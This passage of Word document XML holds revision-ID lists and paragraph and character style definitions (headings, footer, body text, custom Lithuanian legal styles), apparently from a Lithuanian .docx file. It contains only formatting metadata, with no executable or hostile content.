    <w:rsid w:val="7833AC07"/>
    <w:rsid w:val="78346D82"/>
    <w:rsid w:val="7841F592"/>
    <w:rsid w:val="7848A82B"/>
    <w:rsid w:val="7849581E"/>
    <w:rsid w:val="784C260F"/>
    <w:rsid w:val="784C4E56"/>
    <w:rsid w:val="784D2AAC"/>
    <w:rsid w:val="785284B4"/>
    <w:rsid w:val="785B516B"/>
    <w:rsid w:val="785B6488"/>
    <w:rsid w:val="78675EAA"/>
    <w:rsid w:val="7871033C"/>
    <w:rsid w:val="78736B71"/>
    <w:rsid w:val="78782317"/>
    <w:rsid w:val="78811DCF"/>
    <w:rsid w:val="788197E6"/>
    <w:rsid w:val="78827CF7"/>
    <w:rsid w:val="788AA4D0"/>
    <w:rsid w:val="789B7353"/>
    <w:rsid w:val="78AA0152"/>
    <w:rsid w:val="78B0E13A"/>
    <w:rsid w:val="78BA4574"/>
    <w:rsid w:val="78BD6860"/>
    <w:rsid w:val="78C11895"/>
    <w:rsid w:val="78C47704"/>
    <w:rsid w:val="78C83FAF"/>
    <w:rsid w:val="78CD1F26"/>
    <w:rsid w:val="78ECCF1B"/>
    <w:rsid w:val="78F06982"/>
    <w:rsid w:val="78F3FCBB"/>
    <w:rsid w:val="78F47492"/>
    <w:rsid w:val="78FB4E21"/>
    <w:rsid w:val="7901484F"/>
    <w:rsid w:val="7902C082"/>
    <w:rsid w:val="7906C1D4"/>
    <w:rsid w:val="79083E0C"/>
    <w:rsid w:val="790CF0B6"/>
    <w:rsid w:val="790E4889"/>
    <w:rsid w:val="7913B4CE"/>
    <w:rsid w:val="7919320F"/>
    <w:rsid w:val="7919F61B"/>
    <w:rsid w:val="791E12E0"/>
    <w:rsid w:val="79251392"/>
    <w:rsid w:val="7931D379"/>
    <w:rsid w:val="7936424F"/>
    <w:rsid w:val="7936AAFA"/>
    <w:rsid w:val="79382C72"/>
    <w:rsid w:val="793B484F"/>
    <w:rsid w:val="793C0BDB"/>
    <w:rsid w:val="7945A783"/>
    <w:rsid w:val="7947C15B"/>
    <w:rsid w:val="794FCB71"/>
    <w:rsid w:val="795270C4"/>
    <w:rsid w:val="79564466"/>
    <w:rsid w:val="7956DE56"/>
    <w:rsid w:val="79652339"/>
    <w:rsid w:val="7966EEE3"/>
    <w:rsid w:val="7968A839"/>
    <w:rsid w:val="7968CAD4"/>
    <w:rsid w:val="7969A6CD"/>
    <w:rsid w:val="797244BE"/>
    <w:rsid w:val="797A81F1"/>
    <w:rsid w:val="79854FE4"/>
    <w:rsid w:val="7987111F"/>
    <w:rsid w:val="798B205C"/>
    <w:rsid w:val="799174DC"/>
    <w:rsid w:val="7993C732"/>
    <w:rsid w:val="79A5758E"/>
    <w:rsid w:val="79A757E1"/>
    <w:rsid w:val="79A7C4AF"/>
    <w:rsid w:val="79A86495"/>
    <w:rsid w:val="79B0FC06"/>
    <w:rsid w:val="79B3F8D3"/>
    <w:rsid w:val="79B404F1"/>
    <w:rsid w:val="79BC147E"/>
    <w:rsid w:val="79BFD9B5"/>
    <w:rsid w:val="79C019FE"/>
    <w:rsid w:val="79C4F699"/>
    <w:rsid w:val="79CCAFFC"/>
    <w:rsid w:val="79CE9AFD"/>
    <w:rsid w:val="79CF0BF3"/>
    <w:rsid w:val="79D46EB7"/>
    <w:rsid w:val="79D53CDB"/>
    <w:rsid w:val="79D5BFE4"/>
    <w:rsid w:val="79D8AE13"/>
    <w:rsid w:val="79DDDB82"/>
    <w:rsid w:val="79E384F5"/>
    <w:rsid w:val="79EEFACC"/>
    <w:rsid w:val="79F866CA"/>
    <w:rsid w:val="79F9844D"/>
    <w:rsid w:val="79FA8D72"/>
    <w:rsid w:val="79FB1356"/>
    <w:rsid w:val="7A009AA6"/>
    <w:rsid w:val="7A08E322"/>
    <w:rsid w:val="7A0B213E"/>
    <w:rsid w:val="7A0E2FFD"/>
    <w:rsid w:val="7A197B2F"/>
    <w:rsid w:val="7A1C1380"/>
    <w:rsid w:val="7A1E89B2"/>
    <w:rsid w:val="7A219820"/>
    <w:rsid w:val="7A21A83A"/>
    <w:rsid w:val="7A36EB09"/>
    <w:rsid w:val="7A3A49F7"/>
    <w:rsid w:val="7A3C5288"/>
    <w:rsid w:val="7A40D853"/>
    <w:rsid w:val="7A483ED7"/>
    <w:rsid w:val="7A48DF87"/>
    <w:rsid w:val="7A4C7CAF"/>
    <w:rsid w:val="7A5329A7"/>
    <w:rsid w:val="7A59B989"/>
    <w:rsid w:val="7A5E8E94"/>
    <w:rsid w:val="7A65244C"/>
    <w:rsid w:val="7A6676F0"/>
    <w:rsid w:val="7A687B6C"/>
    <w:rsid w:val="7A6C51DD"/>
    <w:rsid w:val="7A755B1C"/>
    <w:rsid w:val="7A822C62"/>
    <w:rsid w:val="7A836650"/>
    <w:rsid w:val="7A8E9B48"/>
    <w:rsid w:val="7A8F5019"/>
    <w:rsid w:val="7A94D835"/>
    <w:rsid w:val="7AA0694E"/>
    <w:rsid w:val="7AA57E48"/>
    <w:rsid w:val="7AA76D17"/>
    <w:rsid w:val="7AA7B990"/>
    <w:rsid w:val="7AAA23E1"/>
    <w:rsid w:val="7AB67D2B"/>
    <w:rsid w:val="7AB98485"/>
    <w:rsid w:val="7AC11248"/>
    <w:rsid w:val="7AC13040"/>
    <w:rsid w:val="7AC25C09"/>
    <w:rsid w:val="7AD66BD4"/>
    <w:rsid w:val="7AD7B989"/>
    <w:rsid w:val="7AD7DC3C"/>
    <w:rsid w:val="7AD99D24"/>
    <w:rsid w:val="7AD9ECD9"/>
    <w:rsid w:val="7ADCF9A9"/>
    <w:rsid w:val="7AE3F04D"/>
    <w:rsid w:val="7AEBF20A"/>
    <w:rsid w:val="7AF1C1F0"/>
    <w:rsid w:val="7AF901CB"/>
    <w:rsid w:val="7AFC37D2"/>
    <w:rsid w:val="7B03E2A1"/>
    <w:rsid w:val="7B10625D"/>
    <w:rsid w:val="7B175F72"/>
    <w:rsid w:val="7B183010"/>
    <w:rsid w:val="7B1E24EA"/>
    <w:rsid w:val="7B275838"/>
    <w:rsid w:val="7B2DD6E0"/>
    <w:rsid w:val="7B2E0637"/>
    <w:rsid w:val="7B2E1123"/>
    <w:rsid w:val="7B3045FF"/>
    <w:rsid w:val="7B336C82"/>
    <w:rsid w:val="7B345F9E"/>
    <w:rsid w:val="7B36B31F"/>
    <w:rsid w:val="7B394DD1"/>
    <w:rsid w:val="7B3BE91A"/>
    <w:rsid w:val="7B3C0A27"/>
    <w:rsid w:val="7B44ED9B"/>
    <w:rsid w:val="7B48E01E"/>
    <w:rsid w:val="7B4A61AD"/>
    <w:rsid w:val="7B4FD4C3"/>
    <w:rsid w:val="7B529077"/>
    <w:rsid w:val="7B5AFED1"/>
    <w:rsid w:val="7B5B5B70"/>
    <w:rsid w:val="7B5E1821"/>
    <w:rsid w:val="7B66A15B"/>
    <w:rsid w:val="7B6F943D"/>
    <w:rsid w:val="7B78E6ED"/>
    <w:rsid w:val="7B7F94F6"/>
    <w:rsid w:val="7B8165F6"/>
    <w:rsid w:val="7B860875"/>
    <w:rsid w:val="7B8C229D"/>
    <w:rsid w:val="7B8D6A98"/>
    <w:rsid w:val="7B8EDF61"/>
    <w:rsid w:val="7B8FBDE5"/>
    <w:rsid w:val="7B901B9C"/>
    <w:rsid w:val="7B92F84C"/>
    <w:rsid w:val="7B971351"/>
    <w:rsid w:val="7B9A5BD9"/>
    <w:rsid w:val="7BA55E09"/>
    <w:rsid w:val="7BB6E560"/>
    <w:rsid w:val="7BB914A5"/>
    <w:rsid w:val="7BBABA8D"/>
    <w:rsid w:val="7BBB1440"/>
    <w:rsid w:val="7BC029D9"/>
    <w:rsid w:val="7BC177BB"/>
    <w:rsid w:val="7BC26A94"/>
    <w:rsid w:val="7BC5BB72"/>
    <w:rsid w:val="7BC77D18"/>
    <w:rsid w:val="7BC92E64"/>
    <w:rsid w:val="7BC9E7CC"/>
    <w:rsid w:val="7BCA91D1"/>
    <w:rsid w:val="7BCE96D0"/>
    <w:rsid w:val="7BEA9952"/>
    <w:rsid w:val="7BF3B5EC"/>
    <w:rsid w:val="7C01D5B4"/>
    <w:rsid w:val="7C040DE4"/>
    <w:rsid w:val="7C0CE712"/>
    <w:rsid w:val="7C0FD8A4"/>
    <w:rsid w:val="7C128609"/>
    <w:rsid w:val="7C15CCEE"/>
    <w:rsid w:val="7C17BF53"/>
    <w:rsid w:val="7C1A9094"/>
    <w:rsid w:val="7C1B66FF"/>
    <w:rsid w:val="7C1D9EDA"/>
    <w:rsid w:val="7C247F2C"/>
    <w:rsid w:val="7C295086"/>
    <w:rsid w:val="7C2C581A"/>
    <w:rsid w:val="7C2C88AE"/>
    <w:rsid w:val="7C32C72D"/>
    <w:rsid w:val="7C3C885A"/>
    <w:rsid w:val="7C3D313E"/>
    <w:rsid w:val="7C46E0DD"/>
    <w:rsid w:val="7C4B53B5"/>
    <w:rsid w:val="7C4CEA8C"/>
    <w:rsid w:val="7C51C47F"/>
    <w:rsid w:val="7C53368A"/>
    <w:rsid w:val="7C5BE1C3"/>
    <w:rsid w:val="7C5D00A1"/>
    <w:rsid w:val="7C5EB6E0"/>
    <w:rsid w:val="7C610705"/>
    <w:rsid w:val="7C6886B1"/>
    <w:rsid w:val="7C6AA5FB"/>
    <w:rsid w:val="7C6D9145"/>
    <w:rsid w:val="7C71D979"/>
    <w:rsid w:val="7C74E92A"/>
    <w:rsid w:val="7C758B40"/>
    <w:rsid w:val="7C789577"/>
    <w:rsid w:val="7C89CBFA"/>
    <w:rsid w:val="7C908397"/>
    <w:rsid w:val="7C9114D4"/>
    <w:rsid w:val="7C92591F"/>
    <w:rsid w:val="7C93C3FC"/>
    <w:rsid w:val="7C9512D0"/>
    <w:rsid w:val="7C954612"/>
    <w:rsid w:val="7C97AB73"/>
    <w:rsid w:val="7C984999"/>
    <w:rsid w:val="7C9F6A5A"/>
    <w:rsid w:val="7CA9AACF"/>
    <w:rsid w:val="7CADC1A3"/>
    <w:rsid w:val="7CB2B54A"/>
    <w:rsid w:val="7CB861AA"/>
    <w:rsid w:val="7CBC9037"/>
    <w:rsid w:val="7CCEC03F"/>
    <w:rsid w:val="7CD07496"/>
    <w:rsid w:val="7CD53574"/>
    <w:rsid w:val="7CD78F13"/>
    <w:rsid w:val="7CD8DBEE"/>
    <w:rsid w:val="7CDA7566"/>
    <w:rsid w:val="7CDB47D5"/>
    <w:rsid w:val="7CDB99D1"/>
    <w:rsid w:val="7CE755A9"/>
    <w:rsid w:val="7CE96B0B"/>
    <w:rsid w:val="7CEAE60B"/>
    <w:rsid w:val="7CF45000"/>
    <w:rsid w:val="7CF6162E"/>
    <w:rsid w:val="7CF72CB1"/>
    <w:rsid w:val="7CFB0166"/>
    <w:rsid w:val="7D077DCB"/>
    <w:rsid w:val="7D0CFB95"/>
    <w:rsid w:val="7D0E0C29"/>
    <w:rsid w:val="7D23AD96"/>
    <w:rsid w:val="7D2DB51F"/>
    <w:rsid w:val="7D370283"/>
    <w:rsid w:val="7D44F327"/>
    <w:rsid w:val="7D4D0A70"/>
    <w:rsid w:val="7D54A046"/>
    <w:rsid w:val="7D5692E8"/>
    <w:rsid w:val="7D5CEDB4"/>
    <w:rsid w:val="7D68639F"/>
    <w:rsid w:val="7D69A07E"/>
    <w:rsid w:val="7D6A0AC7"/>
    <w:rsid w:val="7D6B6E56"/>
    <w:rsid w:val="7D7E0E1F"/>
    <w:rsid w:val="7D89B56E"/>
    <w:rsid w:val="7D8C44F9"/>
    <w:rsid w:val="7D8E21B5"/>
    <w:rsid w:val="7D9884A5"/>
    <w:rsid w:val="7D9DED06"/>
    <w:rsid w:val="7D9E4F60"/>
    <w:rsid w:val="7DA02918"/>
    <w:rsid w:val="7DA59086"/>
    <w:rsid w:val="7DA8E9F9"/>
    <w:rsid w:val="7DA99304"/>
    <w:rsid w:val="7DAA833A"/>
    <w:rsid w:val="7DAE4195"/>
    <w:rsid w:val="7DB83749"/>
    <w:rsid w:val="7DB9047C"/>
    <w:rsid w:val="7DBF8C6F"/>
    <w:rsid w:val="7DC45E0F"/>
    <w:rsid w:val="7DC494C5"/>
    <w:rsid w:val="7DC85488"/>
    <w:rsid w:val="7DCB1EA0"/>
    <w:rsid w:val="7DCCD4DA"/>
    <w:rsid w:val="7DD4EB1A"/>
    <w:rsid w:val="7DDA3CBF"/>
    <w:rsid w:val="7DDDFCD4"/>
    <w:rsid w:val="7DE53752"/>
    <w:rsid w:val="7DE6F9C7"/>
    <w:rsid w:val="7DE8B7D7"/>
    <w:rsid w:val="7DE92E63"/>
    <w:rsid w:val="7DE9D7CF"/>
    <w:rsid w:val="7DEDF12A"/>
    <w:rsid w:val="7DF3A29F"/>
    <w:rsid w:val="7DF3B35C"/>
    <w:rsid w:val="7DFD259E"/>
    <w:rsid w:val="7DFDD020"/>
    <w:rsid w:val="7E0A4983"/>
    <w:rsid w:val="7E0B8472"/>
    <w:rsid w:val="7E0E4793"/>
    <w:rsid w:val="7E1727E9"/>
    <w:rsid w:val="7E190113"/>
    <w:rsid w:val="7E1FE80F"/>
    <w:rsid w:val="7E2F96D5"/>
    <w:rsid w:val="7E30C118"/>
    <w:rsid w:val="7E34EDFC"/>
    <w:rsid w:val="7E41E0A6"/>
    <w:rsid w:val="7E46875B"/>
    <w:rsid w:val="7E567609"/>
    <w:rsid w:val="7E615F65"/>
    <w:rsid w:val="7E62F429"/>
    <w:rsid w:val="7E648763"/>
    <w:rsid w:val="7E69189D"/>
    <w:rsid w:val="7E6A4384"/>
    <w:rsid w:val="7E6B41AA"/>
    <w:rsid w:val="7E6DEF6C"/>
    <w:rsid w:val="7E732F87"/>
    <w:rsid w:val="7E78A187"/>
    <w:rsid w:val="7E8E5802"/>
    <w:rsid w:val="7E8FBF67"/>
    <w:rsid w:val="7E92AC32"/>
    <w:rsid w:val="7EA0DE70"/>
    <w:rsid w:val="7EA23284"/>
    <w:rsid w:val="7EA2917A"/>
    <w:rsid w:val="7EA34E21"/>
    <w:rsid w:val="7EAED050"/>
    <w:rsid w:val="7EB18BCA"/>
    <w:rsid w:val="7EB26E35"/>
    <w:rsid w:val="7EB8746A"/>
    <w:rsid w:val="7EBC6B7C"/>
    <w:rsid w:val="7EBE0975"/>
    <w:rsid w:val="7EC52916"/>
    <w:rsid w:val="7EC5BDB4"/>
    <w:rsid w:val="7EC958E1"/>
    <w:rsid w:val="7ECBB8BB"/>
    <w:rsid w:val="7ED08969"/>
    <w:rsid w:val="7ED19197"/>
    <w:rsid w:val="7ED2FEE0"/>
    <w:rsid w:val="7ED40091"/>
    <w:rsid w:val="7ED6AA98"/>
    <w:rsid w:val="7ED9B57B"/>
    <w:rsid w:val="7EE13F7A"/>
    <w:rsid w:val="7EE8A2B7"/>
    <w:rsid w:val="7EE9987B"/>
    <w:rsid w:val="7EEB6930"/>
    <w:rsid w:val="7EECFE1E"/>
    <w:rsid w:val="7EEE9A0B"/>
    <w:rsid w:val="7EEEA10E"/>
    <w:rsid w:val="7EF31386"/>
    <w:rsid w:val="7EF516FF"/>
    <w:rsid w:val="7EF6036E"/>
    <w:rsid w:val="7EF8BE15"/>
    <w:rsid w:val="7EFB4BB0"/>
    <w:rsid w:val="7EFFDB41"/>
    <w:rsid w:val="7F017BD1"/>
    <w:rsid w:val="7F01AFF1"/>
    <w:rsid w:val="7F02B37A"/>
    <w:rsid w:val="7F034DC9"/>
    <w:rsid w:val="7F0EC66C"/>
    <w:rsid w:val="7F192E6C"/>
    <w:rsid w:val="7F1BE1E9"/>
    <w:rsid w:val="7F203374"/>
    <w:rsid w:val="7F26D5C1"/>
    <w:rsid w:val="7F2B47BD"/>
    <w:rsid w:val="7F301146"/>
    <w:rsid w:val="7F304FC2"/>
    <w:rsid w:val="7F30B543"/>
    <w:rsid w:val="7F35E589"/>
    <w:rsid w:val="7F3641C7"/>
    <w:rsid w:val="7F36E09C"/>
    <w:rsid w:val="7F37E95A"/>
    <w:rsid w:val="7F3FCB77"/>
    <w:rsid w:val="7F44202C"/>
    <w:rsid w:val="7F44BA5A"/>
    <w:rsid w:val="7F45095B"/>
    <w:rsid w:val="7F4D410E"/>
    <w:rsid w:val="7F54F594"/>
    <w:rsid w:val="7F588CEA"/>
    <w:rsid w:val="7F64C23E"/>
    <w:rsid w:val="7F67BBC8"/>
    <w:rsid w:val="7F68161D"/>
    <w:rsid w:val="7F6BC1F5"/>
    <w:rsid w:val="7F6CE7FD"/>
    <w:rsid w:val="7F6D69D3"/>
    <w:rsid w:val="7F6FC8BF"/>
    <w:rsid w:val="7F7BD311"/>
    <w:rsid w:val="7F82EE27"/>
    <w:rsid w:val="7F875C34"/>
    <w:rsid w:val="7F896B4F"/>
    <w:rsid w:val="7F8D9172"/>
    <w:rsid w:val="7F90B54F"/>
    <w:rsid w:val="7F9308E0"/>
    <w:rsid w:val="7F9744E0"/>
    <w:rsid w:val="7F9BC50A"/>
    <w:rsid w:val="7F9C1FF4"/>
    <w:rsid w:val="7F9D1301"/>
    <w:rsid w:val="7FB46C1A"/>
    <w:rsid w:val="7FB6FA6B"/>
    <w:rsid w:val="7FB9A439"/>
    <w:rsid w:val="7FBE1982"/>
    <w:rsid w:val="7FBE2810"/>
    <w:rsid w:val="7FC7D61D"/>
    <w:rsid w:val="7FCA887A"/>
    <w:rsid w:val="7FCBEBE8"/>
    <w:rsid w:val="7FD858B9"/>
    <w:rsid w:val="7FD9E484"/>
    <w:rsid w:val="7FDB15BE"/>
    <w:rsid w:val="7FE1BACD"/>
    <w:rsid w:val="7FE32910"/>
    <w:rsid w:val="7FE36D6D"/>
    <w:rsid w:val="7FEC87DC"/>
    <w:rsid w:val="7FF41D55"/>
    <w:rsid w:val="7FF5CE6F"/>
    <w:rsid w:val="7FF6E163"/>
    <w:rsid w:val="7FF8CB91"/>
    <w:rsid w:val="7FF9A7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9075"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6E74777F-CD6E-4CD0-93FA-6DD974DB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A09"/>
    <w:pPr>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:qFormat/>
    <w:rsid w:val="005B2363"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="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numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="88"/>
      </w:numPr>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semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="000B6E18"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="88"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="360"/>
      </w:tab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919BF"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="88"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="360"/>
      </w:tabs>
      <w:spacing w:before="40" w:line="259" w:lineRule="auto"/>
      <w:jc w:val="left"/>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9919BF"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="88"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="360"/>
      </w:tabs>
      <w:spacing w:before="40" w:line="259" w:lineRule="auto"/>
      <w:jc w:val="left"/>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9919BF"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="88"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="360"/>
      </w:tabs>
      <w:spacing w:before="40" w:line="259" w:lineRule="auto"/>
      <w:jc w:val="left"/>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7D6C3C"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="88"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="360"/>
      </w:tabs>
      <w:spacing w:before="40" w:line="360" w:lineRule="auto"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading8Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="009919BF"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="88"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="360"/>
      </w:tab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19BF"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="88"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="360"/>
      </w:tab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sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:val="x-none" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008E5DB9"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b w:val="0"/>
      <w:color w:val="auto"/>
      <w:sz w:val="24"/>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val="lt-LT" w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama">
    <w:name w:val="Diagrama"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="007D6C3C"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ISTATYMAS">
    <w:name w:val="ISTATYMAS"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00FF31B8"/>
    <w:pPr>
      <w:keepLines/>
      <w:suppressAutoHyphens/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:line="288" w:lineRule="auto"/>
      <w:jc w:val="center"/>
      <w:textAlignment w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:rsid w:val="007144B0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="x-none" w:eastAsia="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:link w:val="Footer"/>
    <w:rsid w:val="007144B0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="x-none" w:eastAsia="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText3">
    <w:name w:val="Body Text 3"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyText3Char"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="001E3D48"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="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lang w:val="x-none" w:eastAsia="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:link w:val="Heading1"/>
    <w:rsid w:val="00FB4B00"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="36"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
      <w:lang w:val="x-none" w:eastAsia="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="bodytext">
    <w:name w:val="bodytext"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00FB4B00"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="istatymas0">
    <w:name w:val="istatymas"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00FB4B00"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>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lang w:val="lt-LT" w:eastAsia="lt-LT"/>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rsid w:val="000F39FE"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="Times New Roman" w:hAnsi="Calibri Light"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="x-none"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lang w:val="x-none" w:eastAsia="x-none"/>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ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:color w:val="000000"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="SubtitleChar"/>
    <w:qFormat/>
    <w:rsid w:val="00482D2F"/>
    <w:pPr>
      <w:spacing w:after="60"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="x-none" w:eastAsia="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CE5AEE"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Neapdorotaspaminjimas1">
    <w:name w:val="Neapdorotas paminėjimas1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006869F8"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading7Char">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="007D6C3C"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama0">
